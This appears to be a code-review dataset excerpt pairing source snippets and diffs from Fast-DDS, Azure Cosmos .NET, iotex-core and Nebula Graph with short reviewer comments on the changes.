{
ParameterVendorId_t p(fastdds::dds::PID_VENDORID, 4);
p.vendorId[0] = this->m_VendorId[0];
p.vendorId[1] = this->m_VendorId[1];
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_expectsInlineQos)
{
ParameterBool_t p(fastdds::dds::PID_EXPECTS_INLINE_QOS, PARAMETER_BOOL_LENGTH, m_expectsInlineQos);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterGuid_t p(fastdds::dds::PID_PARTICIPANT_GUID, PARAMETER_GUID_LENGTH, m_guid);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : metatraffic_locators.multicast)
{
ParameterLocator_t p(fastdds::dds::PID_METATRAFFIC_MULTICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : metatraffic_locators.unicast)
{
ParameterLocator_t p(fastdds::dds::PID_METATRAFFIC_UNICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : default_locators.unicast)
{
ParameterLocator_t p(fastdds::dds::PID_DEFAULT_UNICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : default_locators.multicast)
{
ParameterLocator_t p(fastdds::dds::PID_DEFAULT_MULTICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterTime_t p(fastdds::dds::PID_PARTICIPANT_LEASE_DURATION, PARAMETER_TIME_LENGTH);
p.time = m_leaseDuration;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterBuiltinEndpointSet_t p(fastdds::dds::PID_BUILTIN_ENDPOINT_SET, PARAMETER_BUILTINENDPOINTSET_LENGTH);
p.endpointSet = m_availableBuiltinEndpoints;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (m_participantName.size() > 0)
{
ParameterString_t p(fastdds::dds::PID_ENTITY_NAME, 0, m_participantName);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_userData.size() > 0)
{
UserDataQosPolicy p;
p.data_vec(m_userData);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_properties.properties.size() > 0)
{
ParameterPropertyList_t p(m_properties);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
#if HAVE_SECURITY
if (!this->identity_token_.class_id().empty())
{
ParameterToken_t p(fastdds::dds::PID_IDENTITY_TOKEN, 0);
p.token = identity_token_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (!this->permissions_token_.class_id().empty())
{
ParameterToken_t p(fastdds::dds::PID_PERMISSIONS_TOKEN, 0);
p.token = permissions_token_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if ((this->security_attributes_ != 0UL) || (this->plugin_security_attributes_ != 0UL))
{
ParameterParticipantSecurityInfo_t p;
p.security_attributes = this->security_attributes_;
p.plugin_security_attributes = this->plugin_security_attributes_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
#endif
return CDRMessage::addParameterSentinel(msg);
}
bool ParticipantProxyData::readFromCDRMessage(
CDRMessage_t* msg,
bool use_encapsulation,
const NetworkFactory& network)
{
auto param_process = [this, &network](const Parameter_t* param)
{
switch (param->Pid)
{
case fastdds::dds::PID_KEY_HASH:
{
const ParameterKey_t* p = dynamic_cast<const ParameterKey_t*>(param);
assert(p != nullptr);
GUID_t guid;
iHandle2GUID(guid, p->key);
this->m_guid = guid;
this->m_key = p->key;
break;
}
case fastdds::dds::PID_PROTOCOL_VERSION:
{
const ParameterProtocolVersion_t* p = dynamic_cast<const ParameterProtocolVersion_t*>(param);
assert(p != nullptr);
if (p->protocolVersion.m_major < c_ProtocolVersion.m_major)
{
return false;
}
this->m_protocolVersion = p->protocolVersion;
break;
}
case fastdds::dds::PID_VENDORID:
{
const ParameterVendorId_t* p = dynamic_cast<const ParameterVendorId_t*>(param);
assert(p != nullptr);
this->m_VendorId[0] = p->vendorId[0];
this->m_VendorId[1] = p->vendorId[1];
break;
}
case fastdds::dds::PID_EXPECTS_INLINE_QOS:
{
const ParameterBool_t* p = dynamic_cast<const ParameterBool_t*>(param);
assert(p != nullptr);
this->m_expectsInlineQos = p->value;
break;
}
case fastdds::dds::PID_PARTICIPANT_GUID:
{
const ParameterGuid_t* p = dynamic_cast<const ParameterGuid_t*>(param);
assert(p != nullptr);
this->m_guid = p->guid;
this->m_key = p->guid;
break;
}
case fastdds::dds::PID_METATRAFFIC_MULTICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
metatraffic_locators.add_multicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_METATRAFFIC_UNICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
metatraffic_locators.add_unicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_DEFAULT_UNICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
default_locators.add_unicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_DEFAULT_MULTICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
default_locators.add_multicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_PARTICIPANT_LEASE_DURATION:
{
const ParameterTime_t* p = dynamic_cast<const ParameterTime_t*>(param);
assert(p != nullptr);
this->m_leaseDuration = p->time.to_duration_t();
lease_duration_ =
std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(m_leaseDuration));
break;
}
case fastdds::dds::PID_BUILTIN_ENDPOINT_SET:
{
const ParameterBuiltinEndpointSet_t* p =
dynamic_cast<const ParameterBuiltinEndpointSet_t*>(param);
assert(p != nullptr);
this->m_availableBuiltinEndpoints = p->endpointSet;
break;
}
case fastdds::dds::PID_ENTITY_NAME:
{
const ParameterString_t* p = dynamic_cast<const ParameterString_t*>(param);
assert(p != nullptr);
this->m_participantName = p->getName();
break;
}
case fastdds::dds::PID_PROPERTY_LIST:
{
const ParameterPropertyList_t* p = dynamic_cast<const ParameterPropertyList_t*>(param);
assert(p != nullptr);
this->m_properties = *p;
break;
}
case fastdds::dds::PID_USER_DATA:
{
const UserDataQosPolicy* p = dynamic_cast<const UserDataQosPolicy*>(param);
assert(p != nullptr);
this->m_userData = p->data_vec();
break;
}
case fastdds::dds::PID_IDENTITY_TOKEN:
{
#if HAVE_SECURITY
const ParameterToken_t* p = dynamic_cast<const ParameterToken_t*>(param);
assert(p != nullptr);
this->identity_token_ = std::move(p->token);
#else
logWarning(RTPS_PARTICIPANT, "Received PID_IDENTITY_TOKEN but security is disabled");
#endif
break;
}
case fastdds::dds::PID_PERMISSIONS_TOKEN:
{
#if HAVE_SECURITY
const ParameterToken_t* p = dynamic_cast<const ParameterToken_t*>(param);
assert(p != nullptr);
this->permissions_token_ = std::move(p->token);
#else
logWarning(RTPS_PARTICIPANT, "Received PID_PERMISSIONS_TOKEN but security is disabled");
#endif
break;
}
case fastdds::dds::PID_PARTICIPANT_SECURITY_INFO:
{
#if HAVE_SECURITY
const ParameterParticipantSecurityInfo_t* p =
dynamic_cast<const ParameterParticipantSecurityInfo_t*>(param);
assert(p != nullptr);
this->security_attributes_ = p->security_attributes;
this->plugin_security_attributes_ = p->plugin_security_attributes;
#else
logWarning(RTPS_PARTICIPANT, "Received PID_PARTICIPANT_SECURITY_INFO but security is disabled");
#endif
break;
}
default: break;
}
return true;
};
uint32_t qos_size;
clear();
return ParameterList::readParameterListfromCDRMsg(*msg, param_process, use_encapsulation, qos_size);
}
void ParticipantProxyData::clear()
{
m_protocolVersion = ProtocolVersion_t();
m_guid = GUID_t();
//set_VendorId_Unknown(m_VendorId);
m_VendorId = c_VendorId_Unknown;
m_expectsInlineQos = false;
m_availableBuiltinEndpoints = 0;
metatraffic_locators.unicast.clear();
metatraffic_locators.multicast.clear();
default_locators.unicast.clear();
default_locators.multicast.clear();
m_participantName = "";
m_key = InstanceHandle_t();
m_leaseDuration = Duration_t();
lease_duration_ = std::chrono::microseconds::zero();
isAlive = true;
#if HAVE_SECURITY
identity_token_ = IdentityToken();
permissions_token_ = PermissionsToken();
security_attributes_ = 0UL;
plugin_security_attributes_ = 0UL;
#endif
m_properties.properties.clear();
m_properties.length = 0;
m_userData.clear();
}
void ParticipantProxyData::copy(
const ParticipantProxyData& pdata)
{
m_protocolVersion = pdata.m_protocolVersion;
m_guid = pdata.m_guid;
m_VendorId[0] = pdata.m_VendorId[0];
m_VendorId[1] = pdata.m_VendorId[1];
m_availableBuiltinEndpoints = pdata.m_availableBuiltinEndpoints;
metatraffic_locators = pdata.metatraffic_locators;
default_locators = pdata.default_locators;
m_participantName = pdata.m_participantName;
m_leaseDuration = pdata.m_leaseDuration;
lease_duration_ = std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(pdata.m_leaseDuration));
m_key = pdata.m_key;
isAlive = pdata.isAlive;
m_properties = pdata.m_properties;
m_userData = pdata.m_userData;
    // This method is only called when a new participant is discovered. The destination of the copy
// will always be a new ParticipantProxyData or one from the pool, so there is no need for
// m_readers and m_writers to be copied
#if HAVE_SECURITY
identity_token_ = pdata.identity_token_;
permissions_token_ = pdata.permissions_token_;
security_attributes_ = pdata.security_attributes_;
plugin_security_attributes_ = pdata.plugin_security_attributes_;
#endif
}
bool ParticipantProxyData::updateData(
ParticipantProxyData& pdata)
{
metatraffic_locators = pdata.metatraffic_locators;
default_locators = pdata.default_locators;
m_properties = pdata.m_properties;
m_leaseDuration = pdata.m_leaseDuration;
m_userData = pdata.m_userData;
isAlive = true;
#if HAVE_SECURITY
identity_token_ = pdata.identity_token_;
permissions_token_ = pdata.permissions_token_;
security_attributes_ = pdata.security_attributes_;
plugin_security_attributes_ = pdata.plugin_security_attributes_;
#endif
auto new_lease_duration = std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(m_leaseDuration));
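    // If the remote participant shortened its lease, reschedule the pending liveliness check to the earlier deadline.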
if (this->lease_duration_event != nullptr)
{
if (new_lease_duration < lease_duration_)
{
// Calculate next trigger.
auto real_lease_tm = last_received_message_tm_ + new_lease_duration;
auto next_trigger = real_lease_tm - std::chrono::steady_clock::now();
lease_duration_event->cancel_timer();
lease_duration_event->update_interval_millisec(
(double)std::chrono::duration_cast<std::chrono::milliseconds>(next_trigger).count());
lease_duration_event->restart_timer();
}
}
lease_duration_ = new_lease_duration;
return true;
}
void ParticipantProxyData::set_persistence_guid(
const GUID_t& guid)
{
// only valid values
if (guid == c_Guid_Unknown)
{
return;
}
// generate pair
std::pair<std::string, std::string> persistent_guid;
persistent_guid.first = "PID_PERSISTENCE_GUID";
std::ostringstream data;
data << guid;
persistent_guid.second = data.str();
// if exists replace
std::vector<std::pair<std::string, std::string> >& props = m_properties.properties;
std::vector<std::pair<std::string, std::string> >::iterator it =
std::find_if(
props.begin(),
props.end(),
[&persistent_guid](const std::pair<std::string, std::string>& p)
{
return persistent_guid.first == p.first;
});
if (it != props.end())
{
*it = std::move(persistent_guid);
}
else
{
// if not exists add
m_properties.properties.push_back(std::move(persistent_guid));
}
}
GUID_t ParticipantProxyData::get_persistence_guid() const
{
GUID_t persistent(c_Guid_Unknown);
const std::vector<std::pair<std::string, std::string> >& props = m_properties.properties;
std::vector<std::pair<std::string, std::string> >::const_iterator it =
std::find_if(
props.cbegin(),
props.cend(),
[](const std::pair<std::string, std::string>& p)
{
return "PID_PERSISTENCE_GUID" == p.first;
});
if (it != props.end())
{
std::istringstream in(it->second);
in >> persistent;
}
return persistent;
}
void ParticipantProxyData::assert_liveliness()
{
last_received_message_tm_ = std::chrono::steady_clock::now();
}
} /* namespace rtps */
} /* namespace fastrtps */
} /* namespace eprosima */
| 1 | 16,468 | Is this necessary? | eProsima-Fast-DDS | cpp |
@@ -0,0 +1,15 @@
+namespace Microsoft.Azure.Cosmos.CosmosElements
+{
+ internal abstract class CosmosElement
+ {
+ protected CosmosElement(CosmosElementType cosmosItemType)
+ {
+ this.Type = cosmosItemType;
+ }
+
+ public CosmosElementType Type
+ {
+ get;
+ }
+ }
+} | 1 | 1 | 15,361 | How about this NS inside query NS? | Azure-azure-cosmos-dotnet-v3 | .cs |
|
@@ -53,7 +53,7 @@ func LoadOrCreateAccount(sm protocol.StateManager, encodedAddr string) (*state.A
}
// LoadAccount loads an account state
-func LoadAccount(sm protocol.StateManager, addrHash hash.Hash160) (*state.Account, error) {
+func LoadAccount(sm protocol.StateReader, addrHash hash.Hash160) (*state.Account, error) {
var account state.Account
if err := sm.State(addrHash, &account); err != nil {
if errors.Cause(err) == state.ErrStateNotExist { | 1 | // Copyright (c) 2018 IoTeX
// This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
// warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
// permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
// License 2.0 that can be found in the LICENSE file.
package accountutil
import (
"math/big"
"github.com/pkg/errors"
"github.com/iotexproject/go-pkgs/hash"
"github.com/iotexproject/iotex-address/address"
"github.com/iotexproject/iotex-core/action/protocol"
"github.com/iotexproject/iotex-core/state"
)
type noncer interface {
Nonce() uint64
}
// SetNonce sets nonce for account
func SetNonce(i noncer, state *state.Account) {
if i.Nonce() > state.Nonce {
state.Nonce = i.Nonce()
}
}
// LoadOrCreateAccount either loads an account state or creates an account state
func LoadOrCreateAccount(sm protocol.StateManager, encodedAddr string) (*state.Account, error) {
var account state.Account
addr, err := address.FromString(encodedAddr)
if err != nil {
account = state.EmptyAccount()
return &account, errors.Wrap(err, "failed to get address public key hash from encoded address")
}
addrHash := hash.BytesToHash160(addr.Bytes())
err = sm.State(addrHash, &account)
if err == nil {
return &account, nil
}
if errors.Cause(err) == state.ErrStateNotExist {
account.Balance = big.NewInt(0)
account.VotingWeight = big.NewInt(0)
if err := sm.PutState(addrHash, account); err != nil {
return nil, errors.Wrapf(err, "failed to put state for account %x", addrHash)
}
return &account, nil
}
return nil, err
}
// LoadAccount loads an account state
func LoadAccount(sm protocol.StateManager, addrHash hash.Hash160) (*state.Account, error) {
var account state.Account
if err := sm.State(addrHash, &account); err != nil {
if errors.Cause(err) == state.ErrStateNotExist {
account = state.EmptyAccount()
return &account, nil
}
return nil, err
}
return &account, nil
}
// StoreAccount puts updated account state to trie
func StoreAccount(sm protocol.StateManager, encodedAddr string, account *state.Account) error {
addr, err := address.FromString(encodedAddr)
if err != nil {
return errors.Wrap(err, "failed to get address public key hash from encoded address")
}
addrHash := hash.BytesToHash160(addr.Bytes())
return sm.PutState(addrHash, account)
}
// Recorded tests if an account has been actually stored
func Recorded(sm protocol.StateManager, addr address.Address) (bool, error) {
var account state.Account
err := sm.State(hash.BytesToHash160(addr.Bytes()), &account)
if err == nil {
return true, nil
}
if errors.Cause(err) == state.ErrStateNotExist {
return false, nil
}
return false, err
}
| 1 | 20,479 | in line 79, sm also can be stateReader | iotexproject-iotex-core | go |
@@ -876,6 +876,13 @@ int32_t MetaClient::partsNum(GraphSpaceID spaceId) {
return it->second->partsAlloc_.size();
}
+std::unordered_map<HostAddr, std::vector<PartitionID>>
+MetaClient::partsBySpace(GraphSpaceID spaceId) {
+ folly::RWSpinLock::ReadHolder holder(localCacheLock_);
+ auto it = localCache_.find(spaceId);
+ CHECK(it != localCache_.end());
+ return it->second->partsOnHost_;
+}
folly::Future<StatusOr<TagID>>
MetaClient::createTagSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) { | 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "meta/common/MetaCommon.h"
#include "meta/client/MetaClient.h"
#include "network/NetworkUtils.h"
#include "meta/NebulaSchemaProvider.h"
#include "meta/ClusterIdMan.h"
#include "meta/GflagsManager.h"
DEFINE_int32(load_data_interval_secs, 2 * 60, "Load data interval");
DEFINE_int32(heartbeat_interval_secs, 10, "Heartbeat interval");
DEFINE_int32(meta_client_retry_times, 3, "meta client retry times, 0 means no retry");
DEFINE_int32(meta_client_retry_interval_secs, 1, "meta client sleep interval between retry");
DEFINE_string(cluster_id_path, "cluster.id", "file path saved clusterId");
DECLARE_string(gflags_mode_json);
namespace nebula {
namespace meta {
MetaClient::MetaClient(std::shared_ptr<folly::IOThreadPoolExecutor> ioThreadPool,
std::vector<HostAddr> addrs,
HostAddr localHost,
ClusterID clusterId,
bool sendHeartBeat)
: ioThreadPool_(ioThreadPool)
, addrs_(std::move(addrs))
, localHost_(localHost)
, clusterId_(clusterId)
, sendHeartBeat_(sendHeartBeat) {
CHECK(ioThreadPool_ != nullptr) << "IOThreadPool is required";
CHECK(!addrs_.empty())
<< "No meta server address is specified. Meta server is required";
clientsMan_ = std::make_shared<
thrift::ThriftClientManager<meta::cpp2::MetaServiceAsyncClient>
>();
updateActive();
updateLeader();
bgThread_ = std::make_unique<thread::GenericWorker>();
LOG(INFO) << "Create meta client to " << active_;
}
MetaClient::~MetaClient() {
stop();
VLOG(3) << "~MetaClient";
}
bool MetaClient::isMetadReady() {
if (sendHeartBeat_) {
auto ret = heartbeat().get();
if (!ret.ok() && ret.status() != Status::LeaderChanged()) {
LOG(ERROR) << "Heartbeat failed, status:" << ret.status();
ready_ = false;
return ready_;
}
} // end if
loadData();
loadCfg();
return ready_;
}
bool MetaClient::waitForMetadReady(int count, int retryIntervalSecs) {
std::string gflagsJsonPath;
GflagsManager::getGflagsModule(gflagsModule_);
gflagsDeclared_ = GflagsManager::declareGflags(gflagsModule_);
isRunning_ = true;
int tryCount = count;
while (!isMetadReady() && ((count == -1) || (tryCount > 0)) && isRunning_) {
LOG(INFO) << "Waiting for the metad to be ready!";
--tryCount;
::sleep(retryIntervalSecs);
} // end while
if (!isRunning_) {
LOG(ERROR) << "Connect to the MetaServer Failed";
return false;
}
CHECK(bgThread_->start());
if (sendHeartBeat_) {
LOG(INFO) << "Register time task for heartbeat!";
size_t delayMS = FLAGS_heartbeat_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addTimerTask(delayMS,
FLAGS_heartbeat_interval_secs * 1000,
&MetaClient::heartBeatThreadFunc, this);
}
addLoadDataTask();
addLoadCfgTask();
return ready_;
}
void MetaClient::stop() {
if (bgThread_ != nullptr) {
bgThread_->stop();
bgThread_->wait();
bgThread_.reset();
}
isRunning_ = false;
}
void MetaClient::heartBeatThreadFunc() {
auto ret = heartbeat().get();
if (!ret.ok()) {
LOG(ERROR) << "Heartbeat failed, status:" << ret.status();
return;
}
}
void MetaClient::loadDataThreadFunc() {
loadData();
addLoadDataTask();
}
void MetaClient::loadData() {
if (ioThreadPool_->numThreads() <= 0) {
LOG(ERROR) << "The threads number in ioThreadPool should be greater than 0";
return;
}
auto ret = listSpaces().get();
if (!ret.ok()) {
LOG(ERROR) << "List space failed, status:" << ret.status();
return;
}
decltype(localCache_) cache;
decltype(spaceIndexByName_) spaceIndexByName;
decltype(spaceTagIndexByName_) spaceTagIndexByName;
decltype(spaceEdgeIndexByName_) spaceEdgeIndexByName;
decltype(spaceNewestTagVerMap_) spaceNewestTagVerMap;
decltype(spaceNewestEdgeVerMap_) spaceNewestEdgeVerMap;
decltype(spaceEdgeIndexByType_) spaceEdgeIndexByType;
decltype(spaceAllEdgeMap_) spaceAllEdgeMap;
for (auto space : ret.value()) {
auto spaceId = space.first;
auto r = getPartsAlloc(spaceId).get();
if (!r.ok()) {
LOG(ERROR) << "Get parts allocation failed for spaceId " << spaceId
<< ", status " << r.status();
return;
}
auto spaceCache = std::make_shared<SpaceInfoCache>();
auto partsAlloc = r.value();
spaceCache->spaceName = space.second;
spaceCache->partsOnHost_ = reverse(partsAlloc);
spaceCache->partsAlloc_ = std::move(partsAlloc);
VLOG(2) << "Load space " << spaceId
<< ", parts num:" << spaceCache->partsAlloc_.size();
// loadSchemas
if (!loadSchemas(spaceId,
spaceCache,
spaceTagIndexByName,
spaceEdgeIndexByName,
spaceEdgeIndexByType,
spaceNewestTagVerMap,
spaceNewestEdgeVerMap,
spaceAllEdgeMap)) {
return;
}
cache.emplace(spaceId, spaceCache);
spaceIndexByName.emplace(space.second, spaceId);
}
decltype(localCache_) oldCache;
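    // Swap the freshly built cache in under the write lock, keeping the old one so diff() can notify listeners of changes.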
{
folly::RWSpinLock::WriteHolder holder(localCacheLock_);
oldCache = std::move(localCache_);
localCache_ = std::move(cache);
spaceIndexByName_ = std::move(spaceIndexByName);
spaceTagIndexByName_ = std::move(spaceTagIndexByName);
spaceEdgeIndexByName_ = std::move(spaceEdgeIndexByName);
spaceNewestTagVerMap_ = std::move(spaceNewestTagVerMap);
spaceNewestEdgeVerMap_ = std::move(spaceNewestEdgeVerMap);
spaceEdgeIndexByType_ = std::move(spaceEdgeIndexByType);
spaceAllEdgeMap_ = std::move(spaceAllEdgeMap);
}
diff(oldCache, localCache_);
ready_ = true;
LOG(INFO) << "Load data completed!";
}
void MetaClient::addLoadDataTask() {
size_t delayMS = FLAGS_load_data_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addDelayTask(delayMS, &MetaClient::loadDataThreadFunc, this);
}
bool MetaClient::loadSchemas(GraphSpaceID spaceId,
std::shared_ptr<SpaceInfoCache> spaceInfoCache,
SpaceTagNameIdMap &tagNameIdMap,
SpaceEdgeNameTypeMap &edgeNameTypeMap,
SpaceEdgeTypeNameMap &edgeTypeNameMap,
SpaceNewestTagVerMap &newestTagVerMap,
SpaceNewestEdgeVerMap &newestEdgeVerMap,
SpaceAllEdgeMap &allEdgeMap) {
auto tagRet = listTagSchemas(spaceId).get();
if (!tagRet.ok()) {
LOG(ERROR) << "Get tag schemas failed for spaceId " << spaceId << ", " << tagRet.status();
return false;
}
auto edgeRet = listEdgeSchemas(spaceId).get();
if (!edgeRet.ok()) {
LOG(ERROR) << "Get edge schemas failed for spaceId " << spaceId << ", " << edgeRet.status();
return false;
}
auto tagItemVec = tagRet.value();
auto edgeItemVec = edgeRet.value();
TagIDSchemas tagIdSchemas;
EdgeTypeSchemas edgeTypeSchemas;
for (auto& tagIt : tagItemVec) {
std::shared_ptr<NebulaSchemaProvider> schema(new NebulaSchemaProvider(tagIt.version));
for (auto colIt : tagIt.schema.get_columns()) {
schema->addField(colIt.name, std::move(colIt.type));
}
// handle schema property
schema->setProp(tagIt.schema.get_schema_prop());
tagIdSchemas.emplace(std::make_pair(tagIt.tag_id, tagIt.version), schema);
tagNameIdMap.emplace(std::make_pair(spaceId, tagIt.tag_name), tagIt.tag_id);
// get the latest tag version
auto it = newestTagVerMap.find(std::make_pair(spaceId, tagIt.tag_id));
if (it != newestTagVerMap.end()) {
if (it->second < tagIt.version) {
it->second = tagIt.version;
}
} else {
newestTagVerMap.emplace(std::make_pair(spaceId, tagIt.tag_id), tagIt.version);
}
VLOG(3) << "Load Tag Schema Space " << spaceId << ", ID " << tagIt.tag_id
<< ", Name " << tagIt.tag_name << ", Version " << tagIt.version << " Successfully!";
}
for (auto& edgeIt : edgeItemVec) {
std::shared_ptr<NebulaSchemaProvider> schema(new NebulaSchemaProvider(edgeIt.version));
for (auto colIt : edgeIt.schema.get_columns()) {
schema->addField(colIt.name, std::move(colIt.type));
}
        // handle schema property
schema->setProp(edgeIt.schema.get_schema_prop());
edgeTypeSchemas.emplace(std::make_pair(edgeIt.edge_type, edgeIt.version), schema);
edgeNameTypeMap.emplace(std::make_pair(spaceId, edgeIt.edge_name), edgeIt.edge_type);
edgeTypeNameMap.emplace(std::make_pair(spaceId, edgeIt.edge_type), edgeIt.edge_name);
auto it = allEdgeMap.find(spaceId);
if (it == allEdgeMap.end()) {
std::vector<std::string> v = {edgeIt.edge_name};
allEdgeMap.emplace(spaceId, std::move(v));
} else {
it->second.emplace_back(edgeIt.edge_name);
}
// get the latest edge version
auto it2 = newestEdgeVerMap.find(std::make_pair(spaceId, edgeIt.edge_type));
if (it2 != newestEdgeVerMap.end()) {
if (it2->second < edgeIt.version) {
it2->second = edgeIt.version;
}
} else {
newestEdgeVerMap.emplace(std::make_pair(spaceId, edgeIt.edge_type), edgeIt.version);
}
VLOG(3) << "Load Edge Schema Space " << spaceId << ", Type " << edgeIt.edge_type
<< ", Name " << edgeIt.edge_name << ", Version " << edgeIt.version
<< " Successfully!";
}
spaceInfoCache->tagSchemas_ = std::move(tagIdSchemas);
spaceInfoCache->edgeSchemas_ = std::move(edgeTypeSchemas);
return true;
}
std::unordered_map<HostAddr, std::vector<PartitionID>>
MetaClient::reverse(const PartsAlloc& parts) {
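    // Invert the part -> hosts allocation into a map from each host to the partitions it serves.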
std::unordered_map<HostAddr, std::vector<PartitionID>> hosts;
for (auto& partHost : parts) {
for (auto& h : partHost.second) {
hosts[h].emplace_back(partHost.first);
}
}
return hosts;
}
template<typename Request,
typename RemoteFunc,
typename RespGenerator,
typename RpcResponse,
typename Response>
void MetaClient::getResponse(Request req,
RemoteFunc remoteFunc,
RespGenerator respGen,
folly::Promise<StatusOr<Response>> pro,
bool toLeader,
int32_t retry,
int32_t retryLimit) {
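    // Send the request to the leader (or the active metad) on an IO thread; retry on RPC failure or leader change until retryLimit is reached.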
auto* evb = ioThreadPool_->getEventBase();
HostAddr host;
{
folly::RWSpinLock::ReadHolder holder(&hostLock_);
host = toLeader ? leader_ : active_;
}
folly::via(evb, [host, evb, req = std::move(req), remoteFunc = std::move(remoteFunc),
respGen = std::move(respGen), pro = std::move(pro),
toLeader, retry, retryLimit, this] () mutable {
auto client = clientsMan_->client(host, evb);
LOG(INFO) << "Send request to meta " << host;
remoteFunc(client, req)
.then(evb, [req = std::move(req), remoteFunc = std::move(remoteFunc),
respGen = std::move(respGen), p = std::move(pro), toLeader, retry,
retryLimit, this] (folly::Try<RpcResponse>&& t) mutable {
// exception occurred during RPC
if (t.hasException()) {
if (toLeader) {
updateLeader();
} else {
updateActive();
}
if (retry < retryLimit) {
sleep(FLAGS_meta_client_retry_interval_secs);
getResponse(std::move(req), std::move(remoteFunc), std::move(respGen),
std::move(p), toLeader, retry + 1, retryLimit);
} else {
p.setValue(Status::Error(folly::stringPrintf("RPC failure in MetaClient: %s",
t.exception().what().c_str())));
}
return;
}
auto&& resp = t.value();
if (resp.code == cpp2::ErrorCode::SUCCEEDED) {
// succeeded
p.setValue(respGen(std::move(resp)));
return;
} else if (resp.code == cpp2::ErrorCode::E_LEADER_CHANGED) {
HostAddr leader(resp.get_leader().get_ip(), resp.get_leader().get_port());
{
folly::RWSpinLock::WriteHolder holder(hostLock_);
leader_ = leader;
}
}
// errored
if (retry < retryLimit) {
sleep(FLAGS_meta_client_retry_interval_secs);
getResponse(std::move(req), std::move(remoteFunc), std::move(respGen),
std::move(p), toLeader, retry + 1, retryLimit);
} else {
p.setValue(this->handleResponse(resp));
}
}); // then
}); // via
}
std::vector<HostAddr> MetaClient::to(const std::vector<nebula::cpp2::HostAddr>& tHosts) {
std::vector<HostAddr> hosts;
hosts.resize(tHosts.size());
std::transform(tHosts.begin(), tHosts.end(), hosts.begin(), [](const auto& h) {
return HostAddr(h.get_ip(), h.get_port());
});
return hosts;
}
std::vector<SpaceIdName> MetaClient::toSpaceIdName(const std::vector<cpp2::IdName>& tIdNames) {
std::vector<SpaceIdName> idNames;
idNames.resize(tIdNames.size());
std::transform(tIdNames.begin(), tIdNames.end(), idNames.begin(), [](const auto& tin) {
return SpaceIdName(tin.id.get_space_id(), tin.name);
});
return idNames;
}
template<typename RESP>
Status MetaClient::handleResponse(const RESP& resp) {
switch (resp.get_code()) {
case cpp2::ErrorCode::SUCCEEDED:
return Status::OK();
case cpp2::ErrorCode::E_EXISTED:
return Status::Error("existed!");
case cpp2::ErrorCode::E_NOT_FOUND:
return Status::Error("not existed!");
case cpp2::ErrorCode::E_NO_HOSTS:
return Status::Error("no hosts!");
case cpp2::ErrorCode::E_CONFIG_IMMUTABLE:
return Status::CfgImmutable();
case cpp2::ErrorCode::E_CONFLICT:
return Status::Error("conflict!");
case cpp2::ErrorCode::E_WRONGCLUSTER:
return Status::Error("wrong cluster!");
case cpp2::ErrorCode::E_LEADER_CHANGED: {
return Status::LeaderChanged();
}
default:
return Status::Error("Unknown code %d", static_cast<int32_t>(resp.get_code()));
}
}
PartsMap MetaClient::doGetPartsMap(const HostAddr& host,
const LocalCache& localCache) {
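    // Collect, for every space in the cache, the partitions hosted on the given host together with their peer lists.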
PartsMap partMap;
for (auto it = localCache.begin(); it != localCache.end(); it++) {
auto spaceId = it->first;
auto& cache = it->second;
auto partsIt = cache->partsOnHost_.find(host);
if (partsIt != cache->partsOnHost_.end()) {
for (auto& partId : partsIt->second) {
auto partAllocIter = cache->partsAlloc_.find(partId);
CHECK(partAllocIter != cache->partsAlloc_.end());
auto& partM = partMap[spaceId][partId];
partM.spaceId_ = spaceId;
partM.partId_ = partId;
partM.peers_ = partAllocIter->second;
}
}
}
return partMap;
}
void MetaClient::diff(const LocalCache& oldCache, const LocalCache& newCache) {
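    // Compare old and new partition maps for the local host and fire listener callbacks for added, updated and removed spaces/parts.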
folly::RWSpinLock::WriteHolder holder(listenerLock_);
if (listener_ == nullptr) {
VLOG(3) << "Listener is null!";
return;
}
